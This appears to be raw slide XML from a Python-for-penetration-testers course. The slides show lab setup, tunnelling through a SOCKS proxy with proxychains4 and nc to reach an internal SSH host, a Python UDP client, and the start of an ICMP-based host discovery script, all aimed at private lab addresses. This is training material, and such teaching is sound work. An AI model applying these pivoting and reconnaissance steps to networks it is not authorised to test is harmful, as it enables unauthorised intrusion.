              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>found</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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proxychains4.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[proxychains] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>preloading</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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/lib/x86_64-linux-gnu/libproxychains.so.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[proxychains] DLL init: proxychains-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 4.15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[proxychains] Strict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ...  172.16.238.100:1080  ...  172.16.238.11:22  ...  OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UNKNOWN) [172.16.238.11] 22 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) open : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Operation</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now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>progress</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ proxychains4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user@172.16.238.11's password:</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proxychains’s configuration is set up, we will check if a connection can be made without proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D83677-AB47-44B8-83EE-BB77D4E6CE19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805290" y="2647710"/>
            <a:ext cx="9372047" cy="76944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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.11 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>^C</a:t>
            </a:r>
          </a:p>
          <a:p>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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: connect to host 172.16.238.11 port 22: Connection timed out</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00898F70-164C-40FB-8036-6C37C69ADD96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147961" y="6025010"/>
            <a:ext cx="10438449"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Nice! We’ve got connection through our SOCKS proxy!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Note that we’re not limited to just SSH. We can connect to any host/port we want in the network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5552A5A-2A61-4B55-A964-B4E352858E63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1307520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client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you’d like to interact with a UDP server, you can modify the socket’s type to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SOCK_DGRAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, which signifies that the protocol used is UDP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D83677-AB47-44B8-83EE-BB77D4E6CE19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805290" y="2996626"/>
            <a:ext cx="937204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socket, sys</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socket.AF_INET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socket.SOCK_DGRAM</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s.sendto</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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Hello</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(host, port))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        data, connection = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.recvfrom</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1024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s.sendto</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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"There</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connection)</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"Received bytes:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, data)</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int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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2538663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 this section, we will look at how to write a host discovery script that will show hosts that are alive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>The idea here is to send a UDP packet through our previous UDP client. If the port is closed, the target system will send us an ICMP packet that contains “Destination unreachable (Port unreachable)”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>As an example, we will run our previous UDP client:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7168FE4A-8C79-4BD5-B1BF-1BFD6FA8D6C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2222385" y="3968907"/>
            <a:ext cx="937204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 udp_client.py 172.16.238.100 9999</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1990777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742654" y="1142056"/>
            <a:ext cx="8533693" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Setting up the environment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1172177" y="2007893"/>
            <a:ext cx="10277876"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rebooted, go to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>python-for-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>pentesters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> directory and run the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>setup.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> file.</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625367" y="2917110"/>
            <a:ext cx="10137507" cy="147732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b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>git clone https://gitlab.com/omr00t/python-for-pentesters</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cd python-for-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pentesters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/lab</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./setup.sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BEB6859-F88A-4EC7-A3E0-726E4CAB3DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172177" y="4814404"/>
            <a:ext cx="10277876"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This will take some time to complete.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Once it’s completed, the lab should be ready.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D97A15F1-4F69-4122-A5AE-3E42C8068AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42533225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open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, we will see that an ICMP packet containing “Destination unreachable (Port unreachable)” has been sent back.</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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Calendar&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32B113C-0187-45C7-9215-68DB8BB2E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486" y="2738585"/>
            <a:ext cx="10948737" cy="2489712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FD1308F-50E6-4DAE-A4ED-AE39E38895C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217821" y="2699085"/>
            <a:ext cx="9665402" cy="437148"/>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Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4145201D-71AA-4721-91CE-09192EBF1EAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3517232" y="4956844"/>
            <a:ext cx="4852736" cy="310953"/>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TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61FEB3CC-E64C-4443-998D-BE62F0F16355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147962" y="5442082"/>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This behavior can be utilized to tell whether the host is up or not.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1260220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try to send a packet to a non-existent host:</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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A254369-8CD6-495B-9394-7187AAB08D3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2078006" y="2497043"/>
            <a:ext cx="9372047" cy="30777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python udp_client.py 172.16.238.123 9999</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A37600B1-ADD4-4C44-BAB9-07443A50348F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147962" y="3071862"/>
            <a:ext cx="1020584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will see that we don’t get anything.</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Now that we’re aware of this behavior, we will proceed to script the process in one program.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170433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For this task, we will need to parse IPv4 packet and determine whether the protocol’s type is ICMP. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If it is, we will parse the ICMP packet and extract the data. If it matches the data we sent, then the host that sent the packet is alive.</a:t>
            </a:r>
